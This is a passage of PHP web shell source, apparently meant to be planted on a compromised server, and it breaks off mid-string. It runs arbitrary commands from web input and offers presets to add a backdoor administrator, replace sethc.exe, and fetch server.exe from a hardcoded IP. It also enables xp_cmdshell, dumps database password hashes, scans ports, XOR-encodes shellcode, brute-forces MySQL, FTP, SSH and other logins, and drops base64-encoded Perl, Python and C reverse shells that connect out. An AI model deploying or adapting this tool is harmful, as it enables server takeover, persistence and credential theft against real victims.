|||
|
|
echo '<br>';
|
|||
|
|
$res = 'back screen';
|
|||
|
|
$cmd = 'dir';
|
|||
|
|
if(!empty($_POST['cmd'])){$res = Exec_Run($_POST['cmd']);$cmd = $_POST['cmd'];}
|
|||
|
|
print<<<END
|
|||
|
|
<script language="javascript">
|
|||
|
|
function sFull(i){
|
|||
|
|
Str = new Array(11);
|
|||
|
|
Str[0] = "ver";
|
|||
|
|
Str[1] = "path";
|
|||
|
|
Str[2] = "ipconfig /all";
|
|||
|
|
Str[3] = "whoami";
|
|||
|
|
Str[4] = "tasklist /svc";
|
|||
|
|
Str[5] = "netstat -an";
|
|||
|
|
Str[6] = "systeminfo";
|
|||
|
|
Str[7] = "net user";
|
|||
|
|
Str[8] = "net view";
|
|||
|
|
Str[9] = "net config workstation";
|
|||
|
|
Str[10] = "net config server";
|
|||
|
|
Str[11] = "net user b4che10r b4che10r /add & net localgroup administrators b4che10r /add";
|
|||
|
|
Str[12] = "query user";
|
|||
|
|
Str[13] = "copy c:\\1.php d:\\2.php";
|
|||
|
|
Str[14] = "copy c:\\windows\\explorer.exe c:\\windows\\system32\\sethc.exe & copy c:\\windows\\system32\\sethc.exe c:\\windows\\system32\\dllcache\\sethc.exe";
|
|||
|
|
Str[15] = "tftp -i 219.134.46.245 get server.exe c:\\\\server.exe";
|
|||
|
|
Str[16] = "ps -ef";
|
|||
|
|
Str[17] = "ifconfig";
|
|||
|
|
Str[18] = "cat /etc/syslog.conf";
|
|||
|
|
Str[19] = "cat /etc/my.cnf";
|
|||
|
|
Str[20] = "cat /etc/hosts";
|
|||
|
|
Str[21] = "cat /etc/services";
|
|||
|
|
document.getElementById('cmd').value = Str[i];
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
<div class="actall"><form method="POST" name="gform" id="gform" action="?s=g">
|
|||
|
|
Command: <input type="text" name="cmd" id="cmd" value="{$cmd}" style="width:369px;">
|
|||
|
|
<select onchange='return sFull(options[selectedIndex].value)'>
|
|||
|
|
<option value="0" selected>----Command Collection----</option>
|
|||
|
|
<option value="1">path(win)</option>
|
|||
|
|
<option value="2">ipconfig(win)</option>
|
|||
|
|
<option value="3">whoami(win)</option>
|
|||
|
|
<option value="4">tasklist(win)</option>
|
|||
|
|
<option value="5">port view</option>
|
|||
|
|
<option value="6">systeminfo(win)</option>
|
|||
|
|
<option value="7">net user(win)</option>
|
|||
|
|
<option value="8">net view(win)</option>
|
|||
|
|
<option value="9">net config workstation(win)</option>
|
|||
|
|
<option value="10">net config server(win)</option>
|
|||
|
|
<option value="11">add administrators(win)</option>
|
|||
|
|
<option value="12">query user(win)</option>
|
|||
|
|
<option value="13">copy file(win)</option>
|
|||
|
|
<option value="14">shift backdoor(win)</option>
|
|||
|
|
<option value="15">FTP download(win)</option>
|
|||
|
|
<option value="16">ps(linux)</option>
|
|||
|
|
<option value="17">ifconfig(linux)</option>
|
|||
|
|
<option value="18">syslog.conf(linux)</option>
|
|||
|
|
<option value="19">my.cnf(linux)</option>
|
|||
|
|
<option value="20">hosts(linux)</option>
|
|||
|
|
<option value="21">services(linux)</option>
|
|||
|
|
|
|||
|
|
</select>
|
|||
|
|
<input class="bt" type="submit" value="execute" ></div>
|
|||
|
|
<div class="actall"><textarea name="show" style="width:720px;height:450px;">{$res}</textarea></div>
|
|||
|
|
</form>
|
|||
|
|
END;
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//api
|
|||
|
|
|
|||
|
|
function Com_h()
|
|||
|
|
{
|
|||
|
|
$object = isset($_GET['o']) ? $_GET['o'] : 'adodb';
|
|||
|
|
$com = array("adodb" => "ADODB.Connection","wscript" => "WScript.shell","application" => "Shell.Application");
|
|||
|
|
print<<<END
|
|||
|
|
<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a>
|
|||
|
|
<a href="?s=h&o=wscript">[WScript.shell]</a>
|
|||
|
|
<a href="?s=h&o=application">[Shell.Application]</a></div>
|
|||
|
|
<div class="actall" style="height:200px;">
|
|||
|
|
<form method="POST" name="hform" id="hform" action="?s=h&o={$object}"><br>
|
|||
|
|
END;
|
|||
|
|
$shell = new COM($com[$object]);
|
|||
|
|
if($object == 'wscript')
|
|||
|
|
{
|
|||
|
|
$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';
|
|||
|
|
$cmdpath = isset($_POST['cmdpath']) ? $_POST['cmdpath'] : 'c:\\windows\\system32\\cmd.exe';
|
|||
|
|
print<<<END
|
|||
|
|
 cmdpath:<input type="text" name="cmdpath" value="{$cmdpath}" style="width:600px;"><br>
|
|||
|
|
command:<input type="text" name="cmd" value="{$cmd}" style="width:600px;">
|
|||
|
|
<input class="bt" type="submit" value="execute"></form><br>
|
|||
|
|
END;
|
|||
|
|
if(!empty($_POST['cmd']))
|
|||
|
|
{
|
|||
|
|
|
|||
|
|
$exe = @$shell->exec("$cmdpath /c ".$cmd);
|
|||
|
|
$out = $exe->StdOut();
|
|||
|
|
$output = $out->ReadAll();
|
|||
|
|
echo '<pre>'.$output.'</pre>';
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
elseif($object == 'application')
|
|||
|
|
{
|
|||
|
|
$run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';
|
|||
|
|
$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\windows\php.ini c:\php.ini';
|
|||
|
|
print<<<END
|
|||
|
|
Path:<br><input type="text" name="run" value="{$run}" style="width:600px;">
|
|||
|
|
<br><br>Command argv:<br><input type="text" name="cmd" value="{$cmd}" style="width:600px;">
|
|||
|
|
<br><br><input class="bt" type="submit" value="execute"></form><br>
|
|||
|
|
END;
|
|||
|
|
if(!empty($_POST['run'])) echo (@$shell->ShellExecute($run,'/c '.$cmd) == '0') ? 'Done' : 'Faild';
|
|||
|
|
}
|
|||
|
|
elseif($object == 'adodb')
|
|||
|
|
{
|
|||
|
|
$string = isset($_POST['string']) ? $_POST['string'] : '';
|
|||
|
|
$sql = isset($_POST['sql']) ? $_POST['sql'] : '';
|
|||
|
|
print<<<END
|
|||
|
|
<script language="javascript">
|
|||
|
|
function hFull(i){
|
|||
|
|
if(i==0 || i==10) return false;
|
|||
|
|
Str = new Array(12);
|
|||
|
|
Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb;Jet OLEDB:Database Password=***";
|
|||
|
|
Str[2] = "Driver={Sql Server};Server=localhost,1433;Database=DbName;Uid=sa;Pwd=sa";
|
|||
|
|
Str[3] = "Driver={MySql};Server=localhost;Port=3306;Database=DbName;Uid=root;Pwd=root";
|
|||
|
|
Str[4] = "Provider=OraOLEDB.Oracle.1;User ID=oracle;Password=oracle;Data Source=ORACLE;Persist Security Info=True;";
|
|||
|
|
Str[5] = "driver={IBM db2 odbc DRIVER};database=mydb;hostname=localhost;port=50000;protocol=TCPIP;uid=root; pwd=pass";
|
|||
|
|
Str[6] = "DRIVER={POSTGRESQL};SERVER=127.0.0.1;DATABASE=PostGreSQL;UID=postgresql;PWD=123456;";
|
|||
|
|
Str[7] = "Dsn='';Driver={INFORMIX 3.30 32 BIT};Host=myHostname;Server=myServerName;Service=myServiceName;Protocol=olsoctcp;Database=myDbName;UID=myUsername;PWD=myPassword";
|
|||
|
|
Str[8] = "DSN=mydns;Uid=username;Pwd=password";
|
|||
|
|
Str[9] = "FILEDNS=c:\\\path\\\db.dsn;Uid=username;Pwd=password";
|
|||
|
|
Str[11] = "SELECT * FROM [TableName] WHERE ID<100";
|
|||
|
|
Str[12] = "INSERT INTO [TableName](USER,PASS) VALUES('b4che10r','mypass')";
|
|||
|
|
Str[13] = "UPDATE [TableName] SET USER='b4che10r' WHERE ID=100";
|
|||
|
|
Str[14] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
|
|||
|
|
Str[15] = "DROP TABLE [TableName]";
|
|||
|
|
Str[16] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
|
|||
|
|
Str[17] = "select shell('c:\windows\system32\cmd.exe /c net user b4che10r abc123 /add');";
|
|||
|
|
Str[18] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
|
|||
|
|
Str[19] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
|
|||
|
|
Str[20] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
|
|||
|
|
Str[21] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')";
|
|||
|
|
Str[22] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')";
|
|||
|
|
Str[23] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo '<?php phpinfo();?>' > c:\info.php';";
|
|||
|
|
Str[24] = "sp_makewebtask @outputfile='d:\\\web\\\test.php',@charset=gb2312,@query='select test';";
|
|||
|
|
Str[25] = "Exec master.dbo.xp_cmdshell 'ver';";
|
|||
|
|
Str[26] = "Select Name FROM Master..SysDatabases;";
|
|||
|
|
Str[27] = "select name from sysobjects where type='U';";
|
|||
|
|
Str[28] = "Select Name from SysColumns Where id=Object_Id('TableName');";
|
|||
|
|
Str[29] = "select username,password from dba_users;";
|
|||
|
|
Str[30] = "select TABLE_NAME from all_tables;";
|
|||
|
|
Str[31] = "desc admin;";
|
|||
|
|
Str[32] = "grant connect,resource,dba to user_name;";
|
|||
|
|
Str[33] = "select datname from pg_database;";
|
|||
|
|
Str[34] = "select relname from pg_stat_user_tables;";
|
|||
|
|
Str[35] = "\\\d table_name";
|
|||
|
|
Str[36] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
|
|||
|
|
Str[37] = "\\\! uname -a";
|
|||
|
|
Str[38] = "select schemaname from syscat.schemata;";
|
|||
|
|
Str[39] = "select name from sysibm.systables;";
|
|||
|
|
Str[40] = "select colname from syscat.columns where tabname='table_name';";
|
|||
|
|
Str[41] = "db2 get db cfg for db_name;";
|
|||
|
|
Str[42] = "select name from sysdatabases;";
|
|||
|
|
Str[43] = "select tabname from systables where tabid=n;";
|
|||
|
|
Str[44] = "select tabname,colname,owner,coltype from syscolumns join systables on syscolumns.tabid = systables.tabid;";
|
|||
|
|
Str[45] = "select username,usertype,password from sysusers;";
|
|||
|
|
if(i<=9){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];}
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
conn strings:<br> <input type="text" name="string" id="string" value="{$string}" style="width:800px;">
|
|||
|
|
<select onchange="return hFull(options[selectedIndex].value)">
|
|||
|
|
<option value="0" selected>--select range--</option>
|
|||
|
|
<option value="1">Access</option>
|
|||
|
|
<option value="2">MsSql</option>
|
|||
|
|
<option value="3">MySql</option>
|
|||
|
|
<option value="4">Oracle</option>
|
|||
|
|
<option value="5">DB2</option>
|
|||
|
|
<option value="6">PostGreSQL</option>
|
|||
|
|
<option value="7">Informix</option>
|
|||
|
|
<option value="8">DSN</option>
|
|||
|
|
<option value="9">FILEDSN</option>
|
|||
|
|
<option value="10">--sql statement--</option>
|
|||
|
|
<option value="11">show data</option>
|
|||
|
|
<option value="12">insert data</option>
|
|||
|
|
<option value="13">update data</option>
|
|||
|
|
<option value="14">create table</option>
|
|||
|
|
<option value="15">drop table</option>
|
|||
|
|
<option value="16">add column</option>
|
|||
|
|
<option value="17">access shell()</option>
|
|||
|
|
<option value="18">add xp_cmdsehll(sql2005)</option>
|
|||
|
|
<option value="19">add oacreate(sql2005)</option>
|
|||
|
|
<option value="20">add openrowset(sql2005)</option>
|
|||
|
|
<option value="21">add xp_cmdsehll(sql2000)</option>
|
|||
|
|
<option value="22">add oacreate(sql2000)</option>
|
|||
|
|
<option value="23">oamethod exec</option>
|
|||
|
|
<option value="24">sp_makewebtask</option>
|
|||
|
|
<option value="25">xp_cmdshell</option>
|
|||
|
|
<option value="26">databases(sql)</option>
|
|||
|
|
<option value="27">tables(sql)</option>
|
|||
|
|
<option value="28">columns(sql)</option>
|
|||
|
|
<option value="29">hashes(oracle)</option>
|
|||
|
|
<option value="30">tables(oracle)</option>
|
|||
|
|
<option value="31">columns(oracle)</option>
|
|||
|
|
<option value="32">grant(oracle)</option>
|
|||
|
|
<option value="33">databases(pgsql)</option>
|
|||
|
|
<option value="34">tables(pgsql)</option>
|
|||
|
|
<option value="35">columns(pgsql)</option>
|
|||
|
|
<option value="36">pg_hba.conf(pgsql)</option>
|
|||
|
|
<option value="37">os-command(pgsql)</option>
|
|||
|
|
<option value="38">databases(db2)</option>
|
|||
|
|
<option value="39">tables(db2)</option>
|
|||
|
|
<option value="40">columns(db2)</option>
|
|||
|
|
<option value="41">db config(db2)</option>
|
|||
|
|
<option value="42">databases(informix)</option>
|
|||
|
|
<option value="43">tables(informix)</option>
|
|||
|
|
<option value="44">columns(informix)</option>
|
|||
|
|
<option value="45">hashes(informix)</option>
|
|||
|
|
</select>
|
|||
|
|
<br><br>SQL Commnad:<br> <input type="text" name="sql" id="sql" value="{$sql}" style="width:800px;">
|
|||
|
|
<input class="bt" type="submit" value="execute">
|
|||
|
|
</form><br>
|
|||
|
|
END;
|
|||
|
|
if(!empty($string))
|
|||
|
|
{
|
|||
|
|
@$shell->Open($string);
|
|||
|
|
$result = @$shell->Execute($sql);
|
|||
|
|
$count = $result->Fields->Count();
|
|||
|
|
for($i=0;$i < $count;$i++){$Field[$i] = $result->Fields($i);}
|
|||
|
|
echo $result ? $sql.' Done<br>' : $sql.' Faild<br>';
|
|||
|
|
if(!empty($count)){while(!$result->EOF){for($i=0;$i < $count;$i++){echo $Field[$i]->value.'<br>';}@$result->MoveNext();}}
|
|||
|
|
$shell->Close();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
$shell = NULL;
|
|||
|
|
echo '</div>';
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//scan port
|
|||
|
|
|
|||
|
|
function Port_i()
|
|||
|
|
{
|
|||
|
|
print<<<END
|
|||
|
|
<div class="actall" style="height:200px;">
|
|||
|
|
<form method="POST" name="iform" id="iform" action="?s=i">
|
|||
|
|
Scan IP<br><input type="text" name="ip" value="127.0.0.1" style="width:600px;">
|
|||
|
|
<br><br>Ports<br><input type="text" name="port" value="21|22|1433|1521|3306|3389|4899|5432|5631|5800|8000|8080|43958" style="width:600px;">
|
|||
|
|
<br><br> <input class="bt" type="submit" value="Scan">
|
|||
|
|
</form><br>
|
|||
|
|
END;
|
|||
|
|
if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
|
|||
|
|
{
|
|||
|
|
$ports = explode('|',$_POST['port']);
|
|||
|
|
for($i = 0;$i < count($ports);$i++)
|
|||
|
|
{
|
|||
|
|
$fp = @fsockopen($_POST['ip'],$ports[$i],&$errno,&$errstr,1);
|
|||
|
|
echo $fp ? '<font color="#FF0000">Openned Ports ---> '.$ports[$i].'</font><br>' : 'Closed Ports ---> '.$ports[$i].'<br>';
|
|||
|
|
ob_flush();
|
|||
|
|
flush();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
echo '</div>';
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//convert shellcode
|
|||
|
|
|
|||
|
|
function shellcode_decode($Url_String,$Oday_value)
|
|||
|
|
{
|
|||
|
|
$Oday_value = hexdec($Oday_value);
|
|||
|
|
$$Url_String = str_replace(" ", "", $Url_String);
|
|||
|
|
$SHELL = explode("%u", $Url_String);
|
|||
|
|
for($i=0;$i < count($SHELL);$i++)
|
|||
|
|
{
|
|||
|
|
$Temp = $SHELL[$i];
|
|||
|
|
$s_1 = substr($Temp,2);
|
|||
|
|
$s_2 = substr($Temp,0,2);
|
|||
|
|
$COPY .= $s_1.$s_2;
|
|||
|
|
}
|
|||
|
|
for($n=0; $n < strlen($COPY); $n+=2){$Decode .= pack("C", hexdec(substr($COPY, $n, 2) )^ $Oday_value);}
|
|||
|
|
return $Decode;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function shellcode_encode($Url_String,$Oday_value)
|
|||
|
|
{
|
|||
|
|
$Length =strlen($Url_String);
|
|||
|
|
$Todec = hexdec($Oday_value);
|
|||
|
|
for ($i=0; $i < $Length; $i++)
|
|||
|
|
{
|
|||
|
|
$Temp = ord($Url_String[$i]);
|
|||
|
|
$Hex_Temp = dechex($Temp ^ $Todec);
|
|||
|
|
if (hexdec($Hex_Temp) < 16) $Hex_Temp = '0'.$Hex_Temp;
|
|||
|
|
$hex .= $Hex_Temp;
|
|||
|
|
}
|
|||
|
|
if ($Length%2) $hex .= $Oday_value.$Oday_value; else $hex .= $Oday_value.$Oday_value.$Oday_value.$Oday_value;
|
|||
|
|
for ($n=0; $n < strlen($hex); $n+=4)
|
|||
|
|
{
|
|||
|
|
$Temp = substr($hex, $n, 4);
|
|||
|
|
$s_1= substr($Temp,2);
|
|||
|
|
$s_2= substr($Temp,0,2);
|
|||
|
|
$Encode.= '%u'.$s_1.$s_2;
|
|||
|
|
}
|
|||
|
|
return $Encode;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function shellcode_findxor($Url_String)
|
|||
|
|
{
|
|||
|
|
for ($i = 0; $i < 256; $i++)
|
|||
|
|
{
|
|||
|
|
$shellcode[0] = shellcode_decode($Url_String, dechex($i));
|
|||
|
|
if ((strpos ($shellcode[0],'tp:')) || (strpos ($shellcode[0],'url')) || (strpos ($shellcode[0],'exe')))
|
|||
|
|
{
|
|||
|
|
$shellcode[1] = dechex($i);
|
|||
|
|
return $shellcode;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function Shellcode_j()
|
|||
|
|
{
|
|||
|
|
$Oday_value = '0';
|
|||
|
|
$Shell_Code = 'http://blog.taskkill.net/mm.exe';
|
|||
|
|
$checkeda = ' checked';
|
|||
|
|
$checkedb = '';
|
|||
|
|
if(!empty($_POST['code']))
|
|||
|
|
{
|
|||
|
|
if($_POST['xor'] == 'a' && isset($_POST['number'])){$Oday_value = $_POST['number'];$Shell_Code = shellcode_encode($_POST['code'],$Oday_value);}
|
|||
|
|
if($_POST['xor'] == 'b'){$checkeda = '';$checkedb = ' checked';$Shell_Code_Array = shellcode_findxor($_POST['code']);$Shell_Code = $Shell_Code_Array[0];$Oday_value = $Shell_Code_Array[1];}
|
|||
|
|
if(!$Oday_value) $Oday_value = '0';
|
|||
|
|
if(!$Shell_Code) $Shell_Code = 'could not find the shellcode download url';
|
|||
|
|
$Shell_Code = htmlspecialchars($Shell_Code);
|
|||
|
|
}
|
|||
|
|
print<<<END
|
|||
|
|
<form method="POST" name="jform" id="jform" action="?s=j">
|
|||
|
|
<div class="actall">XOR Value:<input name="number" value="{$Oday_value}" type="text" style="width:50px">
|
|||
|
|
<input type="radio" name="xor" value="a"{$checkeda}>encode shellcode with XOR <input type="radio" name="xor" value="b"{$checkedb}>decode shellcode with XOR</div>
|
|||
|
|
<div class="actall"><textarea name="code" rows="20" cols="165">{$Shell_Code}</textarea></div>
|
|||
|
|
<div class="actall"><input class="bt" type="submit" value="Convert"></div>
|
|||
|
|
</form>
|
|||
|
|
END;
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//weak scan
|
|||
|
|
|
|||
|
|
function Crack_k()
|
|||
|
|
{
|
|||
|
|
$MSG_BOX = 'waiting for message queue......';
|
|||
|
|
$ROOT_DIR = File_Mode();
|
|||
|
|
$SORTS = explode('/',$ROOT_DIR);
|
|||
|
|
array_shift($SORTS);
|
|||
|
|
$PASS = join(',',$SORTS);
|
|||
|
|
for($i = 0;$i < 10;$i++){$n = (string)$i; $PASS .= $n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.$n.',';}
|
|||
|
|
if((!empty($_POST['address'])) && (!empty($_POST['user'])) && (!empty($_POST['pass'])))
|
|||
|
|
{
|
|||
|
|
$SORTPASS = explode(',',$_POST['pass']);
|
|||
|
|
$connect = false;
|
|||
|
|
$MSG_BOX = 'not found';
|
|||
|
|
for($k = 0;$k < count($SORTPASS);$k++)
|
|||
|
|
{
|
|||
|
|
if($_POST['class'] == 'mysql') $connect = @mysql_connect($_POST['address'],$_POST['user'],chop($SORTPASS[$k]));
|
|||
|
|
if($_POST['class'] == 'ftp'){$Ftp_conn = @ftp_connect($_POST['address'],'21');$connect = @ftp_login($Ftp_conn,$_POST['user'],chop($SORTPASS[$k]));}
|
|||
|
|
if($_POST['class'] == 'mssql') $connect = @mssql_connect($_POST['address'],$_POST['user'],chop($SORTPASS[$k]));
|
|||
|
|
// if($_POST['class'] == 'pgsql') $connect = @pg_connect("host=$_POST['address'] port=5432 dbname=postgres user=$_POST['user'] password=".chop($SORTPASS[$k]));
|
|||
|
|
if($_POST['class'] == 'pgsql') $connect = @pg_connect("host={$_POST['address']} port=5432 dbname=postgres user={$_POST['user']} password={chop($SORTPASS[$k])}");
|
|||
|
|
//$connect = @oci_connect('system','oracle','"//localhost/orcl');
|
|||
|
|
if($_POST['class'] == 'oracle') $connect = @oci_connect($_POST['user'],chop($SORTPASS[$k]),$_POST['address']);
|
|||
|
|
if($_POST['class'] == 'ssh'){$ssh_conn = @ssh2_connect($_POST['address'],'22');$connect = @ssh2_auth_password($ssh_conn,$_POST['user'],chop($SORTPASS[$k]));}
|
|||
|
|
if($connect) $MSG_BOX = '[project: '.$_POST['class'].'] [ip: '.$_POST['address'].'] [user: '.$_POST['user'].'] [pass: '.$SORTPASS[$k].']';
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
print<<<END
|
|||
|
|
<form method="POST" name="kform" id="kform" action="?s=k">
|
|||
|
|
<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
|
|||
|
|
<div class="actall">Host <input type="text" name="address" value="localhost" style="width:300px"></div>
|
|||
|
|
<div class="actall">User <input type="text" name="user" value="root" style="width:300px"></div>
|
|||
|
|
<div class="actall">Pass <textarea name="pass" rows="20" cols="165">{$PASS}root,123456,123123,123321,admin,admin888,admin@admin,root@root,qwer123,5201314,iloveyou,fuckyou,kissme,520520,5845201314,a123456,a123456789</textarea></div>
|
|||
|
|
<div class="actall">Crack Project: <input type="radio" name="class" value="mysql" checked>Mysql
|
|||
|
|
<input type="radio" name="class" value="ftp">FTP<input type="radio" name="class" value="mssql" checked>mssql<input type="radio" name="class" value="pgsql" checked>Pgsql<input type="radio" name="class" value="oracle" checked>Oracle<input type="radio" name="class" value="ssh" checked>SSH</div>
|
|||
|
|
<div class="actall"><input class="bt" type="submit" value="Begin"></div></form>
|
|||
|
|
END;
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//back connect
|
|||
|
|
|
|||
|
|
function Linux_l()
|
|||
|
|
{
|
|||
|
|
echo '<br><br>';
|
|||
|
|
print<<<END
|
|||
|
|
<div class="actall" style="height:100px;"><form method="POST" name="lform" id="lform" action="?s=l">
|
|||
|
|
Your IP: <input type="text" name="yourip" value="" style="width:200px">
|
|||
|
|
Your Port: <input type="text" name="yourport" value="1120" style="width:100px">
|
|||
|
|
Script Used: <select name="use" >
|
|||
|
|
<option value="perl">perl</option>
|
|||
|
|
<option value="python">python</option>
|
|||
|
|
<option value="c">c</option>
|
|||
|
|
</select>
|
|||
|
|
<input class="bt" type="submit" value="Connect"></form><br>
|
|||
|
|
END;
|
|||
|
|
if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))
|
|||
|
|
{
|
|||
|
|
if($_POST['use'] == 'perl')
|
|||
|
|
{
|
|||
|
|
$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
|
|||
|
|
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
|
|||
|
|
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
|
|||
|
|
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
|
|||
|
|
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
|
|||
|
|
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
|
|||
|
|
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
|
|||
|
|
echo File_Write('/tmp/b4che10r_pl',base64_decode($back_connect_pl),'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_pl success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_pl faild</font><br>';
|
|||
|
|
$perlpath = Exec_Run('which perl');
|
|||
|
|
$perlpath = $perlpath ? chop($perlpath) : 'perl';
|
|||
|
|
echo Exec_Run($perlpath.' /tmp/b4che10r_pl '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? '<font style=font:11pt color=ff0000>execute command faild</font>' : '<font style=font:11pt color=ff0000>execute command successfully</font>';
|
|||
|
|
}
|
|||
|
|
if($_POST['use'] == 'python')
|
|||
|
|
{
|
|||
|
|
$back_connect_py="IyAtKi0gY29kaW5nOnV0Zi04IC0qLQ0KIyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoiIiINCmJhY2sgY29ubmVjdCBweSB2ZXJzaW9uLG9ubHkgbGludXggaGF2ZS".
|
|||
|
|
"BwdHkgbW9kdWxlDQoiIiINCmltcG9ydCBzeXMsb3Msc29ja2V0LHB0eQ0Kc2hlbGwgPSAiL2Jpbi9zaCINCmRlZiB1c2FnZShuYW1lKToNCiAgICBwcmludCAn".
|
|||
|
|
"cHl0aG9uIGNvbm5lY3QgYmFja2Rvb3InDQogICAgcHJpbnQgJ3VzYWdlOiAlcyA8aXBfYWRkcj4gPHBvcnQ+JyAlIG5hbWUNCg0KZGVmIG1haW4oKToNCiAgIC".
|
|||
|
|
"BpZiBsZW4oc3lzLmFyZ3YpICE9MzoNCiAgICAgICAgdXNhZ2Uoc3lzLmFyZ3ZbMF0pDQogICAgICAgIHN5cy5leGl0KCkNCiAgICBzPXNvY2tldC5zb2NrZXQo".
|
|||
|
|
"c29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KICAgIHRyeToNCiAgICAgICAgcy5jb25uZWN0KChzeXMuYXJndlsxXSxpbnQoc3lzLmFyZ3ZbMl".
|
|||
|
|
"0pKSkNCiAgICAgICAgcHJpbnQgJ2Nvbm5lY3Qgb2snDQogICAgZXhjZXB0Og0KICAgICAgICBwcmludCAnY29ubmVjdCBmYWlsZCcNCiAgICAgICAgc3lzLmV4".
|
|||
|
|
"aXQoKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwyKQ0KICAgIG".
|
|||
|
|
"dsb2JhbCBzaGVsbA0KICAgIG9zLnVuc2V0ZW52KCdISVNURklMRScpDQogICAgb3MudW5zZXRlbnYoJ0hJU1RGSUxFU0laRScpDQogICAgcHR5LnNwYXduKHNo".
|
|||
|
|
"ZWxsKQ0KICAgIHMuY2xvc2UoKQ0KDQppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOg0KICAgIG1haW4oKQ==";
|
|||
|
|
echo File_Write('/tmp/b4che10r_py',base64_decode($back_connect_py),'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_py success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_py faild</font><br>';
|
|||
|
|
$pypath = Exec_Run('which python');
|
|||
|
|
$pypath = $pypath ? chop($pypath) : 'python';
|
|||
|
|
echo Exec_Run($pypath.' /tmp/b4che10r_py '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? '<font style=font:11pt color=ff0000>execute command faild</font>' : '<font style=font:11pt color=ff0000>execute command successfully</font>';
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
if($_POST['use'] == 'c')
|
|||
|
|
{
|
|||
|
|
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
|
|||
|
|
"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
|
|||
|
|
